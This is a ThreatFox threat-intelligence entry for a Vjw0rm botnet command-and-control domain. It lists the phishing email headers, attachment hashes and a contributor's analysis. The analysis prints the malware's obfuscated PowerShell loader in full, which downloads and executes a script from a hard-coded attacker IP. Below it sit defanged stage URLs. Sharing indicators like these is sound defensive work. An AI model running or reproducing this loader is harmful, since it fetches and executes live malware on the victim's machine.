🤲🏼 NEW | abuse.ch Community Hub! Earn recognition 🏅 for the malware intelligence you share, climb the leaderboards 📈, and connect with like-minded contributors who share your hunting focus 🤝. Ready to unlock your profile? Go to the Community Hub →

ThreatFox IOC Database

You are viewing the ThreatFox database entry for domain y6gsh.duckdns.org.

Database Entry


IOC ID:310554
IOC: y6gsh.duckdns.org
IOC Type :domain
Threat Type :botnet_cc
Malware: Vjw0rm
Confidence Level : Confidence level is high (100%)
Is compromised? : False
ASN:AS20473 AS-VULTR
Country:- US
First seen:2022-01-21 18:00:36 UTC
Last seen:never
UUID:08da8422-7ae4-11ec-8ab6-42010aa4000a
Reporter AndreGironda
Reward 5 credits from ThreatFox
Tags:N-W0rm
Reference: https://tria.ge/220121-v4fdlsagbj

Avatar
AndreGironda
MITRE T1566.001
Date: Fri, 21 Jan 2022 08:00-08:30 -0800
Received: from smtp99.iad3a.emailsrvr.com (173.203.187.99)
From: "Candy"<manila7@embroidme-nanuet.com>
Subject: Invoice Order #YOGDRT98JK Attached
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_004E_01C2A9A6.6EFEA25C"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Classification-ID: 8b202e90-3db6-45b4-82e4-0fdee4349111-1-1
Message-ID: <e74ad7fc-19af-4d13-93ea-70b05aafb2a9@DM6NAM11FT066.eop-nam11.prod.protection.outlook.com>
To: Undisclosed recipients:;
Return-Path: manila7@embroidme-nanuet.com
Attachment Name: RG0078KL.zip
Zipfile SHA256: a0e90bedc05940e3ea4827928d70e024da64b023bccd35594f5d02cda1cb217a
Unzipped ISO Name: RG0078KL.iso
ISO Container SHA256: 0a9615096fc3d3af82168ab7fa372dc2b3294df014d8b5e94cd9a34fb3026ec7
Contained VBScript Name: RG0078KL.vbs
VBScript SHA256: 10a5a95ddae4178a39013124606a36d5694098afbaac187fa133603ea4aa2237

VBS Code --
function H1($i) {$r = '' ;for ($n = 0; $n -Lt $i.LengtH; $n += 2){$r += [cHar][int]('0x' + $i.Substring($n,2))}return $r};$H2 = (new-object ('{1}{0}{2}' -f'WebCL','net.','ient'));$H3 = H1 '446f776E';$H4 = H1 '6C6f';$H5 = H1 '616473747269';$H6 = H1 '6E67';$H7 = $H3+$H4+$H5+$H6;$H8 = $H2.$H7('HttP://170.39.212.195/Ps12.txt');iEX $H8

Stage 1 URL: hXXp://170[.]39.212.195/Ps12[.]txt
Stage HTA SHA256: 5cbcc919f504d4ecb4aabf8f930bc30bb756788283c5bd6af41bf40744743944
Stage 2 URL: hXXp://170[.]39.212.195/Server2[.]txt